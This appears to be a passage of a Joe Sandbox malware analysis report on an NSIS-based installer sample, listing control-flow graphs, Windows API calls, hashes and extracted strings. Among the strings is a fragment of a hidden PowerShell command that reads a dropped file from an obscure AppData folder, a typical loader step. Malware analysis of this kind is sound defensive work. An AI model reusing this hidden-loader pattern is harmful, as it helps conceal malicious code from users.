731->711 732->711 733->725 746 406f7b 734->746 747 406f1f-406f3d 734->747 735->707 735->746 736->717 737->711 749 406d05-406d09 739->749 740->711 741->688 742->719 748 406c57-406c9d 742->748 743->723 744->711 745->727 745->729 746->721 753 406f55-406f67 747->753 754 406f3f-406f53 747->754 750 406cc5-406cc7 748->750 751 406c9f-406ca3 748->751 749->728 752 406d0b-406d11 749->752 758 406cd5-406cdd 750->758 759 406cc9-406cd3 750->759 756 406ca5-406ca8 GlobalFree 751->756 757 406cae-406cbc GlobalAlloc 751->757 760 406d13-406d1a 752->760 761 406d3b-406d4d 752->761 755 406f6a-406f74 753->755 754->755 755->734 762 406f76 755->762 756->757 757->719 763 406cc2 757->763 758->749 759->758 759->759 764 406d25-406d35 GlobalAlloc 760->764 765 406d1c-406d1f GlobalFree 760->765 761->745 767 4075b6-4075c0 762->767 768 406efc-406f14 762->768 763->750 764->719 764->761 765->764 767->711 768->734
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                  • Instruction ID: 5203db86b2e08fd3ebfde089d8ff8c44169432d1db75552ad8ea7513f2b1afa9
                                                  • Opcode Fuzzy Hash: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                  • Instruction Fuzzy Hash: 64F16570D04229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A86CF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\Cricotomy66\Refleksivs, xrefs: 0040226E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\Cricotomy66\Refleksivs
                                                  • API String ID: 542301482-3791577056
                                                  • Opcode ID: 6760e42f22e9d138664f12b34c65327dfba2e7b4ff811b538689507e29d6bef6
                                                  • Instruction ID: 6031f0b9305bb7b05064ab4f17c9904609ff1c452577966f293784d012f03e0b
                                                  • Opcode Fuzzy Hash: 6760e42f22e9d138664f12b34c65327dfba2e7b4ff811b538689507e29d6bef6
                                                  • Instruction Fuzzy Hash: 4A410475A00209AFCB40DFE4C989EAD7BB5BF48308B20457EF505EB2D1DB799982CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(74DF3420,00425F98,00425750,004060A2,00425750,00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004069EA
                                                  • FindClose.KERNEL32(00000000), ref: 004069F6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                  • Instruction ID: 87b64c9cece2c57c139ea7904c9da033401fae8fb112df8880c97ca139bbac6e
                                                  • Opcode Fuzzy Hash: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                  • Instruction Fuzzy Hash: EBD012716096205BD64067386E0C94B7A589F16331722CA36F06BF21E0D7348C628A9C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 202 404102-404114 203 40411a-404120 202->203 204 40427b-40428a 202->204 203->204 205 404126-40412f 203->205 206 4042d9-4042ee 204->206 207 40428c-4042d4 GetDlgItem * 2 call 404601 SetClassLongW call 40140b 204->207 210 404131-40413e SetWindowPos 205->210 211 404144-40414b 205->211 208 4042f0-4042f3 206->208 209 40432e-404333 call 40464d 206->209 207->206 213 4042f5-404300 call 401389 208->213 214 404326-404328 208->214 221 404338-404353 209->221 210->211 216 40414d-404167 ShowWindow 211->216 217 40418f-404195 211->217 213->214 238 404302-404321 SendMessageW 213->238 214->209 220 4045ce 214->220 222 404268-404276 call 404668 216->222 223 40416d-404180 GetWindowLongW 216->223 224 404197-4041a9 DestroyWindow 217->224 225 4041ae-4041b1 217->225 227 4045d0-4045d7 220->227 234 404355-404357 call 40140b 221->234 235 40435c-404362 221->235 222->227 223->222 236 404186-404189 ShowWindow 223->236 228 4045ab-4045b1 224->228 230 4041b3-4041bf SetWindowLongW 225->230 231 4041c4-4041ca 225->231 228->220 241 4045b3-4045b9 228->241 230->227 231->222 237 4041d0-4041df GetDlgItem 231->237 234->235 242 404368-404373 235->242 243 40458c-4045a5 DestroyWindow EndDialog 235->243 236->217 244 4041e1-4041f8 SendMessageW IsWindowEnabled 237->244 245 4041fe-404201 237->245 238->227 241->220 246 4045bb-4045c4 ShowWindow 241->246 242->243 247 404379-4043c6 call 4066bf call 404601 * 3 GetDlgItem 242->247 243->228 244->220 244->245 249 404203-404204 245->249 250 404206-404209 245->250 246->220 274 4043d0-40440c ShowWindow KiUserCallbackDispatcher call 404623 EnableWindow 247->274 275 4043c8-4043cd 247->275 252 404234-404239 call 4045da 249->252 253 404217-40421c 250->253 254 40420b-404211 250->254 252->222 257 404252-404262 SendMessageW 253->257 259 40421e-404224 253->259 254->257 258 404213-404215 254->258 257->222 258->252 262 404226-40422c call 40140b 259->262 263 40423b-404244 call 40140b 259->263 272 404232 262->272 263->222 271 404246-404250 263->271 271->272 272->252 278 404411 274->278 279 40440e-40440f 274->279 275->274 280 404413-404441 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404443-404454 SendMessageW 280->281 282 404456 280->282 283 40445c-40449b call 404636 call 4040e3 call 406682 lstrlenW call 4066bf SetWindowTextW call 401389 281->283 282->283 283->221 294 4044a1-4044a3 283->294 294->221 295 4044a9-4044ad 294->295 296 4044cc-4044e0 DestroyWindow 295->296 297 4044af-4044b5 295->297 296->228 298 4044e6-404513 CreateDialogParamW 296->298 297->220 299 4044bb-4044c1 297->299 298->228 301 404519-404570 call 404601 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 298->301 299->221 300 4044c7 299->300 300->220 301->220 306 404572-404585 ShowWindow call 40464d 301->306 308 40458a 306->308 308->228
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040413E
                                                  • ShowWindow.USER32(?), ref: 0040415E
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404170
                                                  • ShowWindow.USER32(?,00000004), ref: 00404189
                                                  • DestroyWindow.USER32 ref: 0040419D
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041B6
                                                  • GetDlgItem.USER32(?,?), ref: 004041D5
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041E9
                                                  • IsWindowEnabled.USER32(00000000), ref: 004041F0
                                                  • GetDlgItem.USER32(?,00000001), ref: 0040429B
                                                  • GetDlgItem.USER32(?,00000002), ref: 004042A5
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 004042BF
                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404310
                                                  • GetDlgItem.USER32(?,00000003), ref: 004043B6
                                                  • ShowWindow.USER32(00000000,?), ref: 004043D7
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043E9
                                                  • EnableWindow.USER32(?,?), ref: 00404404
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040441A
                                                  • EnableMenuItem.USER32(00000000), ref: 00404421
                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404439
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040444C
                                                  • lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404476
                                                  • SetWindowTextW.USER32(?,00422F48), ref: 0040448A
                                                  • ShowWindow.USER32(?,0000000A), ref: 004045BE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID: H/B
                                                  • API String ID: 121052019-184950203
                                                  • Opcode ID: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
                                                  • Instruction ID: f8b0abefa6079376cca3afd4ac47b8e6787ccd0873a3a79b8952b84eeba681b3
                                                  • Opcode Fuzzy Hash: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
                                                  • Instruction Fuzzy Hash: 91C1CFB1600204BBDB316F61EE85A2B7AB8EB85345F41053EF741B25F0CB795842DB2D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 309 403d54-403d6c call 406a76 312 403d80-403db7 call 406550 309->312 313 403d6e-403d7e call 4065c9 309->313 318 403db9-403dca call 406550 312->318 319 403dcf-403dd5 lstrcatW 312->319 322 403dda-403e03 call 40402a call 406059 313->322 318->319 319->322 327 403e95-403e9d call 406059 322->327 328 403e09-403e0e 322->328 334 403eab-403ed0 LoadImageW 327->334 335 403e9f-403ea6 call 4066bf 327->335 328->327 329 403e14-403e3c call 406550 328->329 329->327 336 403e3e-403e42 329->336 338 403f51-403f59 call 40140b 334->338 339 403ed2-403f02 RegisterClassW 334->339 335->334 340 403e54-403e60 lstrlenW 336->340 341 403e44-403e51 call 405f7e 336->341 350 403f63-403f6e call 40402a 338->350 351 403f5b-403f5e 338->351 342 404020 339->342 343 403f08-403f4c SystemParametersInfoW CreateWindowExW 339->343 347 403e62-403e70 lstrcmpiW 340->347 348 403e88-403e90 call 405f51 call 406682 340->348 341->340 346 404022-404029 342->346 343->338 347->348 354 403e72-403e7c GetFileAttributesW 347->354 348->327 362 403f74-403f8e ShowWindow call 406a06 350->362 363 403ff7-403ff8 call 4057da 350->363 351->346 357 403e82-403e83 call 405f9d 354->357 358 403e7e-403e80 354->358 357->348 358->348 358->357 370 403f90-403f95 call 406a06 362->370 371 403f9a-403fac GetClassInfoW 362->371 366 403ffd-403fff 363->366 368 404001-404007 366->368 369 404019-40401b call 40140b 366->369 368->351 372 40400d-404014 call 40140b 368->372 369->342 370->371 375 403fc4-403fe7 DialogBoxParamW call 40140b 371->375 376 403fae-403fbe GetClassInfoW RegisterClassW 371->376 372->351 380 403fec-403ff5 call 403ca4 375->380 376->375 380->346
                                                  APIs
                                                    • Part of subcall function 00406A76: GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
                                                    • Part of subcall function 00406A76: GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                  • lstrcatW.KERNEL32(1033,00422F48), ref: 00403DD5
                                                  • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,74DF3420), ref: 00403E55
                                                  • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E68
                                                  • GetFileAttributesW.KERNEL32(: Completed), ref: 00403E73
                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver), ref: 00403EBC
                                                    • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                  • RegisterClassW.USER32(00428A00), ref: 00403EF9
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F11
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F46
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403F7C
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FA8
                                                  • GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FB5
                                                  • RegisterClassW.USER32(00428A00), ref: 00403FBE
                                                  • DialogBoxParamW.USER32(?,00000000,00404102,00000000), ref: 00403FDD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\87tBuE42ft.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 1975747703-1733155645
                                                  • Opcode ID: 71c901060660e6c141de3759ee92f1f28cb94e09091d7fc82daae4b4f1af527d
                                                  • Instruction ID: 33830a549d8bd1c9ff3d4095a28b7d5feb3a0022977f60bfd4e6bbc11b1c7dcb
                                                  • Opcode Fuzzy Hash: 71c901060660e6c141de3759ee92f1f28cb94e09091d7fc82daae4b4f1af527d
                                                  • Instruction Fuzzy Hash: 4661D570200741BAD620AB669E46F2B3A7CEB84709F41453FFA45B61E2DF795902CB2D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 383 4030d5-403123 GetTickCount GetModuleFileNameW call 406172 386 403125-40312a 383->386 387 40312f-40315d call 406682 call 405f9d call 406682 GetFileSize 383->387 388 40336f-403373 386->388 395 403163 387->395 396 403248-403256 call 403033 387->396 398 403168-40317f 395->398 402 403327-40332c 396->402 403 40325c-40325f 396->403 400 403181 398->400 401 403183-40318c call 4035e7 398->401 400->401 410 403192-403199 401->410 411 4032e3-4032eb call 403033 401->411 402->388 405 403261-403279 call 4035fd call 4035e7 403->405 406 40328b-4032d7 GlobalAlloc call 406bd1 call 4061a1 CreateFileW 403->406 405->402 435 40327f-403285 405->435 432 4032d9-4032de 406->432 433 4032ed-40331d call 4035fd call 403376 406->433 412 403215-403219 410->412 413 40319b-4031af call 40612d 410->413 411->402 420 403223-403229 412->420 421 40321b-403222 call 403033 412->421 413->420 430 4031b1-4031b8 413->430 423 403238-403240 420->423 424 40322b-403235 call 406b63 420->424 421->420 423->398 431 403246 423->431 424->423 430->420 437 4031ba-4031c1 430->437 431->396 432->388 444 403322-403325 433->444 435->402 435->406 437->420 439 4031c3-4031ca 437->439 439->420 441 4031cc-4031d3 439->441 441->420 443 4031d5-4031f5 441->443 443->402 445 4031fb-4031ff 443->445 444->402 446 40332e-40333f 444->446 449 403201-403205 445->449 450 403207-40320f 445->450 447 403341 446->447 448 403347-40334c 446->448 447->448 451 40334d-403353 448->451 449->431 449->450 450->420 452 403211-403213 450->452 451->451 453 403355-40336d call 40612d 451->453 452->420 453->388
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004030E9
                                                  • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00403105
                                                    • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,00437800,80000000,00000003), ref: 00406176
                                                    • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198
                                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040314E
                                                  • GlobalAlloc.KERNELBASE(00000040,00008001), ref: 00403290
                                                  Strings
                                                  • soft, xrefs: 004031C3
                                                  • C:\Users\user\Desktop, xrefs: 00403130, 00403135, 0040313B
                                                  • Error launching installer, xrefs: 00403125
                                                  • Inst, xrefs: 004031BA
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403327
                                                  • "C:\Users\user\Desktop\87tBuE42ft.exe", xrefs: 004030DE
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004030DF, 004032A8
                                                  • Null, xrefs: 004031CC
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\87tBuE42ft.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 2803837635-543935948
                                                  • Opcode ID: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                  • Instruction ID: fa10dec2ede943269712b0c7dd26c00cc534fb31fc6fa5581d899c5550bae655
                                                  • Opcode Fuzzy Hash: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                  • Instruction Fuzzy Hash: 0171B071E00204ABDB20DFA4ED86B9E7AACAB04316F60457FF515B62D1CB7C9E418B5C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 456 4066bf-4066c8 457 4066ca-4066d9 456->457 458 4066db-4066f5 456->458 457->458 459 406905-40690b 458->459 460 4066fb-406707 458->460 461 406911-40691e 459->461 462 406719-406726 459->462 460->459 463 40670d-406714 460->463 465 406920-406925 call 406682 461->465 466 40692a-40692d 461->466 462->461 464 40672c-406735 462->464 463->459 467 4068f2 464->467 468 40673b-40677e 464->468 465->466 470 406900-406903 467->470 471 4068f4-4068fe 467->471 472 406784-406790 468->472 473 406896-40689a 468->473 470->459 471->459 474 406792 472->474 475 40679a-40679c 472->475 476 40689c-4068a3 473->476 477 4068ce-4068d2 473->477 474->475 480 4067d6-4067d9 475->480 481 40679e-4067c4 call 406550 475->481 478 4068b3-4068bf call 406682 476->478 479 4068a5-4068b1 call 4065c9 476->479 482 4068e2-4068f0 lstrlenW 477->482 483 4068d4-4068dd call 4066bf 477->483 492 4068c4-4068ca 478->492 479->492 487 4067db-4067e7 GetSystemDirectoryW 480->487 488 4067ec-4067ef 480->488 497 4067ca-4067d1 call 4066bf 481->497 498 40687e-406881 481->498 482->459 483->482 493 406879-40687c 487->493 494 406801-406805 488->494 495 4067f1-4067fd GetWindowsDirectoryW 488->495 492->482 499 4068cc 492->499 493->498 500 40688e-406894 call 406930 493->500 494->493 496 406807-406825 494->496 495->494 502 406827-40682d 496->502 503 406839-406851 call 406a76 496->503 497->493 498->500 505 406883-406889 lstrcatW 498->505 499->500 500->482 509 406835-406837 502->509 513 406853-406866 SHGetPathFromIDListW CoTaskMemFree 503->513 514 406868-406871 503->514 505->500 509->503 511 406873-406877 509->511 511->493 513->511 513->514 514->496 514->511
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004067E1
                                                  • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004067F7
                                                  • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406855
                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040685E
                                                  • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406889
                                                  • lstrlenW.KERNEL32(: Completed,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004068E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                  • String ID: -windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Fr$: Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 4024019347-793815347
                                                  • Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                  • Instruction ID: 4a93dbd931fcfc477af1f24740db1e2af50c51fdf4929e220b088375b48f32a9
                                                  • Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                  • Instruction Fuzzy Hash: 586147B26053005BEB206F25DD80B6B77E8AB54318F26453FF587B22D0DB3C8961875E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
